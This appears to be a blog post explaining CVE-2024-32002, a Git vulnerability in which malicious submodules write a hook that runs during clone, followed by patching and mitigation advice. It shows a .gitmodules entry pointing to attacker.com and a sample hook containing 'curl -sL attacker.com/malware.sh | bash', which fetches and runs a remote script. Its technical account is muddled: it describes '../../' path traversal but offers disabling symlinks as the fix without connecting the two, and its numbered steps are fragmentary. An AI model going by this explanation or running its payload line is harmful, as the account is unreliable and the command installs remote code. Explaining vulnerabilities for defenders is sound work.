CVE-2024-32002 - Critical Git Vulnerability Lets Attackers Run Code During Clone via Malicious Submodules

Git is one of the world’s most widely used version control systems. Millions of developers rely on it every day to store and manage code. But recently, security researchers discovered a severe vulnerability tracked as CVE-2024-32002 that can let attackers execute code on your computer just by tricking you into cloning a malicious repository.

Let’s break down how this works, what’s at risk, and how to protect yourself, using clear language and exclusive insights.

What Is CVE-2024-32002?

This vulnerability affects all Git versions prior to 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If you’re using an older version, you are at risk.

Malicious actors can carefully craft a Git repository with submodules.

- When you clone this repo, Git can be tricked into writing files not into the submodule’s folder, but into a special directory called .git/.

One of these files could be a Git *hook*—a script that runs during certain Git operations.

- The malicious hook gets executed *while you’re still cloning* the repository, meaning you don’t have a chance to review or stop it.

This is particularly dangerous, as even a cautious user would have no chance to inspect the malicious code before it runs.

Submodule: A repo inside another repo, tracked as a commit in a subdirectory.

- Hook: A script located in the .git/hooks/ directory that runs automatically at certain points, like after a clone or pull.

What’s the trick?

The attacker uses a path traversal bug (sometimes called a “directory escape”) in submodules. They make the submodule’s files point outside their folder, specifically to .git/hooks/. When you clone, Git writes their file to this sensitive directory.

Example Exploit (Code Snippet)

Below is a simplified illustration of how a malformed submodule might look. This is NOT a real attack, but it shows the principle:

# .gitmodules (in attacker's repo)
[submodule "evil_module"]
    path = evil
    url = https://attacker.com/evil.git

# Inside evil.git, an attacker places a file with a tricky path:
evil_module/
  ../../.git/hooks/post-checkout

The malicious hook, post-checkout, could contain

#!/bin/bash
echo "You have been pwned!" > ~/hacked.txt

Or something more dangerous, like

#!/bin/bash
curl -sL attacker.com/malware.sh | bash

When you clone the attacker’s repo, Git writes post-checkout into .git/hooks/, and then executes it.

Host a malicious repository with a submodule and a crafted .gitmodules file.

2. In the submodule’s history, insert files that use relative paths, like ../../.git/hooks/pre-checkout, to escape their intended folder.

When the victim runs git clone --recurse-submodules, the attack triggers automatically.

No interaction is required!
You don’t have to run or build any code inside the repo. The simple act of cloning is enough to compromise your system.

Run this command to check your Git version

git --version

On Linux: update with your package manager (e.g. sudo apt update && sudo apt upgrade git).

On macOS: brew upgrade git

On Windows: Download the latest Git from git-scm.com.

If you cannot immediately update, disable symlinks globally (note: some workflows might break)

git config --global core.symlinks false

This disables the file link behavior that the exploit relies upon.

Only clone repositories you trust!

- Verify links before you copy-paste that git clone ... command from random websites, social media, or emails.

If you’re running automated systems (like CI/CD), make sure they use the patched version of Git.


### 4. Audit Your .git/hooks

Periodically check your .git/hooks/ directory for any unexpected files

ls -l .git/hooks/

Learn More

- Original CVE-2024-32002 advisory
- Git's official release notes

Final Thoughts

CVE-2024-32002 is a critical issue that turns a simple git clone into a potential attack vector. Keeping your tools updated and being careful where you get your code from is more important than ever.

If you run software that depends on Git, or if you manage developer infrastructure, patch *immediately*. The exploit is easy to abuse, and public proof of concepts are starting to appear.

Stay safe, and share this with your team!

For more technical and security updates, follow the latest posts and advisories—because today’s safe repo could be tomorrow’s trap.

Timeline

Published on: 05/14/2024 19:15:10 UTC
Last modified on: 06/26/2024 10:15:11 UTC